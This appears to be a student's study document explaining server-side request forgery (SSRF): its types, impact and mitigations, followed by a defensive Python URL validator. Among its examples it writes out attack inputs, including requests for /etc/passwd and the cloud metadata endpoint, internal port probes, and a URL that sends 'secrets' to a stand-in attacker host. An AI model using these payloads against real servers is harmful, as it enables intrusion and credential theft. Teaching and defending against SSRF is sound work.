SSRF

what is ssrf ?

Uploaded by

anurag.21bcan254
SSRF

# WHAT IS SSRF

Server-side request forgery is a web security vulnerability that allows an attacker to cause the server-side application to make requests to an unintended location.

In a typical SSRF attack, the attacker might cause the server to make a connection to internal-only services within the organization's infrastructure. In other cases, they may be able to force the server to connect to arbitrary external systems. This could leak sensitive data, such as authorization credentials.

# WHAT ARE THE TYPES OF SSRF ?

Server-Side Request Forgery (SSRF) can be categorized into several types based on how it is exploited and the kind of target systems involved. Below are the primary types:

1. Basic SSRF
The attacker uses the vulnerability to access both internal and external resources directly.
- Example:
  - Input: http://internal-api.local/admin
  - Effect: The server fetches an internal URL, exposing sensitive data.

2. Blind SSRF
In blind SSRF, the attacker cannot see the direct response but can infer success or failure indirectly (e.g., by observing server behavior, logs, or timing).
- Example Exploits:
  - Trigger DNS lookups by inputting: http://attacker-domain.com. The attacker detects the server's IP by monitoring DNS queries.
  - Use timing to detect differences in how long the server takes to respond to different requests.

3. SSRF via HTTP Redirection
The attacker provides a URL that redirects the server to another target.
- Example:
  - Input URL: http://malicious-site.com/redirect-to-internal
  - Redirects to: http://internal-service/admin

4. Protocol-Specific SSRF
Exploits SSRF vulnerabilities to use non-HTTP protocols, such as FTP, SMB, or file schemes.
- Example Exploits:
  - Fetching files using the file:// scheme: file:///etc/passwd
  - Interacting with services using gopher:// or ftp://.

5. Recursive SSRF (or SSRF Chaining)
The attacker chains multiple SSRF requests together to escalate the attack or bypass restrictions.
- Example: Use an SSRF vulnerability to pivot through multiple internal services, eventually accessing critical resources.

6. Cloud Metadata SSRF
Specifically targets cloud environments by exploiting SSRF to access metadata endpoints, such as AWS, GCP, or Azure metadata.
- Example:
  - Target URL: http://169.254.169.254/latest/meta-data/
  - Result: Retrieves sensitive information like access tokens or instance details.

7. Out-of-Band (OOB) SSRF
Similar to blind SSRF but relies on external interaction for feedback. The attacker triggers the server to send requests to an external resource they control, then monitors that resource for signs of the attack.
- Example: Input a URL like http://attacker-controlled-server.com, then monitor the server's incoming HTTP requests.

8. Time-Based SSRF
The attacker infers success or failure by observing differences in server response times, often used in blind SSRF scenarios.
- Example:
  - Query an internal service, causing a delay due to resource contention.
  - Query a non-existent service, resulting in an immediate error.

9. SSRF for Port Scanning
The attacker uses SSRF to scan for open ports or services on internal networks.
- Example:
  - Test different ports: http://internal-service:22, http://internal-service:80.
  - Response times and errors reveal which ports are open.

10. SSRF for Data Exfiltration
The attacker uses SSRF to extract sensitive data by including the data as part of the request or response.
- Example:
  - Fetch a sensitive file: http://internal-service/file?name=/etc/passwd.
  - Send data externally: http://attacker-site.com/upload?data=secrets.

Preventing SSRF
- Enforce strict input validation and URL whitelisting.
- Restrict outgoing requests to known, trusted domains.
- Use network segmentation to isolate sensitive services.
- Block access to IP ranges like 169.254.0.0/16 (cloud metadata) and private IP ranges (10.x.x.x, 192.168.x.x).
- Monitor and log unusual server requests.

# IMPACT & MITIGATION MEASURES OF SSRF

Impact of SSRF
1. Access Internal Systems: Exploit private services like APIs, databases, or admin panels.
2. Data Leakage: Steal sensitive information (e.g., credentials, configuration files).
3. Remote Code Execution (RCE): Execute malicious code via misconfigured services.
4. Port Scanning: Discover open ports and services for further attacks.
5. Abuse and DDoS: Use the server as a proxy for malicious activities.
6. Cloud Exploits: Access cloud metadata to hijack credentials.

Mitigation Measures
1. Validate Inputs: Whitelist trusted URLs/domains; block private IPs.
2. Restrict Network Access: Limit outbound requests and block internal IP ranges.
3. Enforce URL Restrictions: Allow only approved schemes (e.g., http://).
4. Cloud Protections: Use secure configurations like AWS IMDSv2.
5. Use a WAF: Block SSRF patterns with Web Application Firewalls.
6. Monitor and Log: Detect unusual request behavior.
7. Rate Limits and Timeouts: Prevent abuse and mitigate blind SSRF.
8. Test Regularly: Identify vulnerabilities via pentests and scans.
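The scheme restriction, private-range blocking and redirect handling called for under Preventing SSRF and Mitigation Measures, as an added Python example that is not part of the original document. It assumes http/https are the only approved schemes and substitutes a constructed DNS table (FAKE_DNS) for real resolution so it runs offline; a deployment would resolve with socket.getaddrinfo instead.

```python
import ipaddress
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}
MAX_REDIRECTS = 3

# Constructed DNS table so the example runs offline (a deployment would collect
# every A/AAAA answer from socket.getaddrinfo). Last entry mimics DNS rebinding.
FAKE_DNS = {
    "example.com": ["93.184.216.34"],
    "internal-api.local": ["10.0.0.5"],
    "rebind.test": ["93.184.216.34", "127.0.0.1"],
}

def is_public_ip(ip_str):
    """False for loopback, RFC 1918, link-local (169.254/16, which covers the
    cloud metadata address), multicast and other non-global address space."""
    ip = ipaddress.ip_address(ip_str)
    return ip.is_global and not ip.is_multicast

def validate_url(url, resolver=FAKE_DNS.get):
    """(ok, reason): approved scheme, no embedded credentials, every resolved address public."""
    p = urlparse(url)
    if p.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {p.scheme!r}"
    if not p.hostname:
        return False, "missing host"
    if p.username or p.password:
        return False, "credentials embedded in URL"
    try:  # a literal IP (including bracketed IPv6) skips DNS and is checked directly
        addrs = [str(ipaddress.ip_address(p.hostname))]
    except ValueError:
        addrs = resolver(p.hostname) or []
    if not addrs:
        return False, f"host does not resolve: {p.hostname}"
    for addr in addrs:  # a single non-public answer is enough to refuse
        if not is_public_ip(addr):
            return False, f"{p.hostname} resolves to non-public {addr}"
    return True, "ok"

def fetch_with_safe_redirects(url, fetch, resolver=FAKE_DNS.get):
    """Follow Location headers by hand, re-validating each hop; fetch(url) -> (status, location)."""
    for _ in range(MAX_REDIRECTS + 1):
        ok, reason = validate_url(url, resolver)
        if not ok:
            return None, reason
        status, location = fetch(url)
        if status not in (301, 302, 303, 307, 308):
            return url, "fetched"
        url = location
    return None, "too many redirects"
```

The HTTP client must be configured not to follow redirects itself, otherwise the per-hop check in fetch_with_safe_redirects never sees the intermediate target.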
# LABS
